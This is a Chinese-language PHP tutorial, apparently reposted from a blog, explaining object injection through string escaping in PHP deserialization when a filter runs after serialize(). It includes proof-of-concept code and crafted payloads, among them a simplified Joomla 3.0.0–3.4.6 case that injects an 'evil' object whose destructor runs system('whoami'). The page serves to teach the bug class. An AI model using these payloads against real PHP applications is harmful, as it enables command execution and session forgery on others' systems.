PHP字元逃脫導致的物件注入詳解-php教程-PHP中文網

首頁

後端開發

php教程

PHP字元逃脫導致的物件注入詳解

angryTom

Nov 29, 2019 pm 04:30 PM

1.漏洞产生原因：

序列化的字符串在经过过滤函数不正确的处理而导致对象注入，目前看到都是因为过滤函数放在了serialize函数之后，要是放在序列化之前应该就不会产生这个问题

<?php
function filter($string){
  $a = str_replace(&#39;x&#39;,&#39;zz&#39;,$string);
   return $a;
}
$username = "tr1ple";
$password = "aaaaax";
$user = array($username, $password);
echo(serialize($user));
echo "\n";
$r = filter(serialize($user));
echo($r);
echo "\n";
var_dump(unserialize($r));
$a=&#39;a:2:{i:0;s:6:"tr1ple";i:1;s:5:"aaaaa";}i:1;s:5:"aaaaa";&#39;;
var_dump(unserialize($a));

PHP字元逃脫導致的物件注入詳解

php特性：

1.PHP 在反序列化时，底层代码是以 ; 作为字段的分隔，以 } 作为结尾(字符串除外)，并且是根据长度判断内容的

2.对类中不存在的属性也会进行反序列化

以上代码就明显存在一个问题，即从序列化后的字符串中明显可以看到经过filter函数以后s:6对应的字符串明显变长了

并且如果对于a:2:{i:0;s:6:"tr1ple";i:1;s:5:"aaaaa";}i:1;s:5:"aaaaa"; 这种字符串而言，也能够正常反序列化，说明php在反序列化的时候只要求一个反序列化字符串块合法即可，当然得是第一个字符串块

以上代码为例，如果能够利用filter函数这种由一个字符变为两个字符的特性来注入想要反序列化后得到的属性，使其可以逃逸出更多可用的字符串，那么我们就能反序列化得到我们想要的属性

比如此时我们想要让反序列化后第二个字符串为123456，此时我们的payload如果和之前的username长度为a，则filter处理以后可能username就会变成a，此时我们的payload变成了新的注入的属性，此时反序列化后就会得到我们想要的结果，比如a:2:{i:0;s:6:"tr1ple";i:1;s:6:"123456";}是我们想要达到的效果，此时我们想要注入的payload明显为：

";i:1;s:6:"123456";}

PHP字元逃脫導致的物件注入詳解

可以得到其长度为20

此时我们已经知道过滤的规则为x->yy，即注入一个x可以逃逸出一个字符的空位，那么我们只需要注入20个x即可变成40个y，即可逃逸出20个空位，从而将我们的payload变为反序列化后得到的属性值

$username = 'tr1plexxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}'; //其中红色就是我们想要注入的属性值 
$password="aaaaa";
$user = array($username, $password);
echo(serialize($user));
echo "\n";
$r = filter(serialize($user));
echo($r);
echo "\n";
var_dump(unserialize($r));

PHP字元逃脫導致的物件注入詳解

可以看到此时注入属性成功，反序列化后得到的属性即为123456

2.实例分析

joomla3.0.0-3.4.6 对象注入导致的反序列化,以下为参考别人的简易化核心漏洞代码

<?php
class evil{
    public $cmd;
    public function __construct($cmd){
        $this->cmd = $cmd;
    }
    public function __destruct(){
        system($this->cmd);
    }
}
class User
{
    public $username;
    public $password;
    public function __construct($username, $password){
        $this->username = $username;
        $this->password = $password;
    }
}
function write($data){
    $data = str_replace(chr(0).&#39;*&#39;.chr(0), &#39;\0\0\0&#39;, $data);
    file_put_contents("dbs.txt", $data);
}
function read(){
    $data = file_get_contents("dbs.txt");
    $r = str_replace(&#39;\0\0\0&#39;, chr(0).&#39;*&#39;.chr(0), $data);
    return $r;
}
if(file_exists("dbs.txt")){
    unlink("dbs.txt");  
}
$username = "tr1ple";
$password = "A";
$payload = &#39;";s:8:"password";O:4:"evil":1:{s:3:"cmd";s:6:"whoami";}&#39;; write(serialize(new User($username, $password))); var_dump(unserialize(read()));

在这里如果想要通过注入对象来实现反序列化则必须在外部对象内进行注入存在的属性，不能在其外部，否则php将不会进行我们注入恶意对象的反序列化

例如此时因为反序列化读取的时候将会将六位字符\0\0\0替换成三位字符chr(0)*chr(0),因此字符串前面的s肯定是固定的，那么s对应的字符串变少以后将会吞掉其他属性的字符，那么如果我们精心算好吞掉的字符长度，并且能够控制被吞掉属性的内容，那么就能够注入对象，从而反序列化其他类

PHP字元逃脫導致的物件注入詳解

比如如上所示，此时我们要注入的对象为evil，此时username和password的值我们可控，那么我们可以在username中注入\0，来吞掉password的值，比如

<?php
$a=&#39;\0\0\0&#39;;
echo strlen($a);
$b=str_replace(&#39;\0\0\0&#39;, chr(0).&#39;*&#39;.chr(0), $a);
echo strlen($b);

所以此时首先确定我们要吞掉的字符的长度

O:4:"User":2:{s:8:"username";s:6:"tr1ple";s:8:"password";s:4:"1234";}

正常情况下我们要吞掉 ";s:8:"password";s:4:" 为22位

PHP字元逃脫導致的物件注入詳解

但是因为注入的对象payload也在password字段，并且长度肯定是>=10的，因此s肯定是两位数，因此这里为22+1=23位字符

因为是6->3，因此每次添加一组\0\0\0能多吞掉3个字符，因此需要肯定都是3的倍数

因此我们假如这里构造username为\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0

PHP字元逃脫導致的物件注入詳解

则经过read函数处理后长度将变为24

PHP字元逃脫導致的物件注入詳解

即此时能够多吞掉24个字符，为了不让其吞掉payload，我们可以填充1位字符A，即令password的值为A+payload即可

<?php
class evil{
    public $cmd;
    public function __construct($cmd){
        $this->cmd = $cmd;
    }
    public function __destruct(){
        system($this->cmd);
    }
}
class User
{
    public $username;
    public $password;
    public function __construct($username, $password){
        $this->username = $username;
        $this->password = $password;
    }
}
function write($data){
    $data = str_replace(chr(0).&#39;*&#39;.chr(0), &#39;\0\0\0&#39;, $data);
    file_put_contents("dbs.txt", $data);
}
function read(){
    $data = file_get_contents("dbs.txt");
    $r = str_replace(&#39;\0\0\0&#39;, chr(0).&#39;*&#39;.chr(0), $data);
    return $r;
}
if(file_exists("dbs.txt")){
    unlink("dbs.txt");  
}
$username = "\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0";
$password = "A";
$payload = &#39;";s:8:"password";O:4:"evil":1:{s:3:"cmd";s:6:"whoami";}&#39;; $shellcode=$password.$payload; write(serialize(new User($username, $password))); var_dump(unserialize(read()));

PHP字元逃脫導致的物件注入詳解

執行結果如上圖所示，將成功反序列化password屬性所對應的值，其值即為我們注入的對象，整個過程也容易理解，就是吞掉後面的屬性來注入屬性，那麼達到攻擊有以下要求：

1.相鄰兩個屬性的值是我們可以控制的

2.前一個屬性的s長度可以改變，變長變短都可以，變短的話可以吞掉後面相鄰屬性的值，然後在相鄰屬性中註入新的對象，如果邊長則可以直接在該屬性中註入對象來達到反序列化

比如XNUCA2018 hardphp就考察了一個這個相關的trick

這裡就出現了用前面的data在反序列化時向後吞一位字符，從而可以導致吞掉後面的普通用戶的username字段，而在username字段可以放上我們想要偽造的username，從而達到偽造session的目的

更多PHP相關知識，請訪問PHP中文網！

以上是PHP字元逃脫導致的物件注入詳解的詳細內容。更多資訊請關注PHP中文網其他相關文章！

陳述

本文轉載於：博客园。如有侵權，請聯絡admin@php.cn刪除

PHP的目的：構建動態網站Apr 15, 2025 am 12:18 AM

PHP用於構建動態網站，其核心功能包括：1.生成動態內容，通過與數據庫對接實時生成網頁；2.處理用戶交互和表單提交，驗證輸入並響應操作；3.管理會話和用戶認證，提供個性化體驗；4.優化性能和遵循最佳實踐，提升網站效率和安全性。

PHP：處理數據庫和服務器端邏輯Apr 15, 2025 am 12:15 AM

PHP在數據庫操作和服務器端邏輯處理中使用MySQLi和PDO擴展進行數據庫交互，並通過會話管理等功能處理服務器端邏輯。 1）使用MySQLi或PDO連接數據庫，執行SQL查詢。 2）通過會話管理等功能處理HTTP請求和用戶狀態。 3）使用事務確保數據庫操作的原子性。 4）防止SQL注入，使用異常處理和關閉連接來調試。 5）通過索引和緩存優化性能，編寫可讀性高的代碼並進行錯誤處理。

您如何防止PHP中的SQL注入？（準備的陳述，PDO）Apr 15, 2025 am 12:15 AM

在PHP中使用預處理語句和PDO可以有效防範SQL注入攻擊。 1)使用PDO連接數據庫並設置錯誤模式。 2)通過prepare方法創建預處理語句，使用佔位符和execute方法傳遞數據。 3)處理查詢結果並確保代碼的安全性和性能。

PHP和Python：代碼示例和比較Apr 15, 2025 am 12:07 AM

PHP和Python各有優劣，選擇取決於項目需求和個人偏好。 1.PHP適合快速開發和維護大型Web應用。 2.Python在數據科學和機器學習領域佔據主導地位。

PHP行動：現實世界中的示例和應用程序Apr 14, 2025 am 12:19 AM

PHP在電子商務、內容管理系統和API開發中廣泛應用。 1)電子商務：用於購物車功能和支付處理。 2)內容管理系統：用於動態內容生成和用戶管理。 3)API開發：用於RESTfulAPI開發和API安全性。通過性能優化和最佳實踐，PHP應用的效率和可維護性得以提升。

PHP：輕鬆創建交互式Web內容Apr 14, 2025 am 12:15 AM

PHP可以輕鬆創建互動網頁內容。 1)通過嵌入HTML動態生成內容，根據用戶輸入或數據庫數據實時展示。 2)處理表單提交並生成動態輸出，確保使用htmlspecialchars防XSS。 3)結合MySQL創建用戶註冊系統，使用password_hash和預處理語句增強安全性。掌握這些技巧將提升Web開發效率。